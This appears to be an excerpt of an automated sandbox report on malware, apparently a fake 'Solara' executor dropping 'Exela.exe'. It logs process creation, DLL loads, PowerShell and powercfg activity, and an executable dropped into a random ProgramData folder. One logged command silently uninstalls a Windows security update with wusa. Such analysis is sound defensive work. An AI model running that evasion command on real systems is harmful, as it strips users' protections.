                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pcacli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
